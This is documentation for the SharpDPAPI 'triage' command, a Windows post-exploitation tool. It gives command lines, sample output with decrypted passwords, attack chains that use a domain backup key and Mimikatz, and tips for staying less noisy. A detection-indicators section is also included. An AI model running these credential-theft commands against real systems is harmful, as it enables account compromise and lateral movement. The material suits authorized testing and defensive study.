Skip to main content

Overview

The triage command is a comprehensive wrapper that executes all user DPAPI extraction commands in a single run. It automatically triages credentials, vaults, RDG files, and certificates for all accessible users on the system.
This is the recommended starting point for user DPAPI triage. It runs the equivalent of credentials, vaults, rdg, and certificates commands.

Basic Usage

# Triage with domain backup key
SharpDPAPI.exe triage /pvk:key.pvk

# Triage with user password
SharpDPAPI.exe triage /password:Password123!

# Triage with masterkey mappings
SharpDPAPI.exe triage {GUID1}:SHA1 {GUID2}:SHA1

# Remote system triage
SharpDPAPI.exe triage /pvk:key.pvk /server:workstation.domain.com

Command Arguments

Decryption Methods

  • Domain Backup Key
  • User Credentials
  • Masterkey Mappings
  • RPC Decryption
# Base64-encoded key
SharpDPAPI.exe triage /pvk:HvG1sAAAAAABAAAAAAAAAAAAAAC...

# Key file
SharpDPAPI.exe triage /pvk:key.pvk

Targeting Options

ArgumentDescription
/server:SERVERTriage remote server (requires admin access and pvk/password)
When using /server, you must also supply either /pvk or /password for decryption.

What Gets Triaged

The triage command executes the following operations:
1

Credential Manager Credentials

Searches %LOCALAPPDATA%\Microsoft\Credentials\ for all users and decrypts credential files
2

Windows Vaults

Searches %LOCALAPPDATA%\Microsoft\Vault\ folders and decrypts vault data (browser passwords, etc.)
3

RDP Passwords

Searches for RDCMan.settings and .rdg files containing saved RDP connection passwords
4

User Certificates

Searches %APPDATA%\Microsoft\Crypto\RSA\ for user certificate private keys

Execution Context

  • Elevated
  • Unelevated
When run with administrative privileges:
  • Triages all users on the system
  • Accesses all user profile directories
  • Maximum data collection

Example Output

[*] Action: User DPAPI Credential Triage

[*] Using a domain DPAPI backup key to triage masterkeys for decryption key mappings!

[*] User master key cache:

{42e95117-ff5f-40fa-a6fc-87584758a479}:4C802894C566B235B7F34B011316E94CC4CE4665
{feef7b25-51d6-4e14-a52f-eb2a387cd0f3}:f9bc09dad3bc2cd00efd903a9b61c42e6c9ab0f4

[*] Triaging Credentials for ALL users

Folder       : C:\Users\harmj0y\AppData\Local\Microsoft\Credentials\

  CredFile           : 48C08A704ADBA03A93CD7EC5B77C0EAB
    guidMasterKey    : {885342c6-028b-4ecf-82b2-304242e769e0}
    description      : Local Credential Data
    LastWritten      : 1/22/2019 2:44:40 AM
    TargetName       : Domain:target=TERMSRV/10.4.10.101
    UserName         : DOMAIN\user
    Credential       : Password!

[*] Triaging Vaults for ALL users

[*] Triaging Vault folder: C:\Users\harmj0y\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28

  VaultID            : 4bf4c442-9b8a-41a0-b380-dd4a704ddb28
  Name               : Web Credentials
    LastWritten      : 10/12/2018 12:10:42 PM
    FriendlyName     : Internet Explorer
    Identity         : admin
    Resource         : https://10.0.0.1/
    Authenticator    : Password!

[*] Triaging RDCMan Settings Files for ALL users

[*] Triaging User Certificates

Common Scenarios

After obtaining domain admin and retrieving the backup key:
# 1. Get backup key
SharpDPAPI.exe backupkey /file:key.pvk

# 2. Triage local system
SharpDPAPI.exe triage /pvk:key.pvk

# 3. Triage multiple remote systems
SharpDPAPI.exe triage /pvk:key.pvk /server:ws01.domain.com
SharpDPAPI.exe triage /pvk:key.pvk /server:ws02.domain.com
SharpDPAPI.exe triage /pvk:key.pvk /server:dc.domain.com
Using Mimikatz-extracted masterkeys:
# 1. Extract masterkeys with Mimikatz
# mimikatz# privilege::debug
# mimikatz# sekurlsa::dpapi

# 2. Run triage with extracted keys
SharpDPAPI.exe triage {8abc35b1-b718-4a86-9781-7fd7f37101dd}:ae349cdd... {feef7b25-51d6-4e14-a52f-eb2a387cd0f3}:f9bc09dad...
When you have a specific user’s credentials:
# Using password
SharpDPAPI.exe triage /password:SecurePassword123

# Using NTLM hash
SharpDPAPI.exe triage /ntlm:8846F7EAEE8FB117AD06BDD830B7586C

Detection Considerations

The triage command generates significant host activity that can be detected.
Detection Indicators:
  • Bulk access to multiple users’ DPAPI directories
  • Reading of Credential Manager files
  • Access to Vault folders across user profiles
  • Enumeration of certificate stores
  • Potential LSASS access (if masterkeys are extracted)
Defensive Monitoring:
  • Monitor bulk access to %LOCALAPPDATA%\Microsoft\Credentials\
  • Alert on access to %LOCALAPPDATA%\Microsoft\Vault\
  • Track certificate private key file access
  • Monitor for process accessing multiple user profiles
  • Detect non-standard processes reading DPAPI protected data

credentials

Decrypt only Credential Manager credentials

vaults

Decrypt only Windows Vault data

rdg

Decrypt only RDP connection passwords

certificates

Decrypt only certificate private keys

machinetriage

Triage machine/SYSTEM DPAPI data

backupkey

Retrieve domain DPAPI backup key

Tips

  • Use /mkfile instead of inline masterkeys for better performance
  • Target specific users when possible instead of triaging all users
  • Use individual commands (credentials, vaults) if you only need specific data types
  • Run without elevation to only triage current user (less noisy)
  • Use /unprotect for RDG files when possible (no masterkeys needed)
  • Target specific remote systems instead of broad sweeps
  • Redirect output to file with /consoleoutfile to minimize artifacts
No data decrypted:
  • Verify decryption method is correct (pvk, password, masterkeys)
  • Check if DPAPI data actually exists for target users
  • Ensure proper permissions to read user profile directories
Access denied errors:
  • Elevate to Administrator for multi-user triage
  • Verify remote admin access for /server operations
  • Check if target files are locked or in use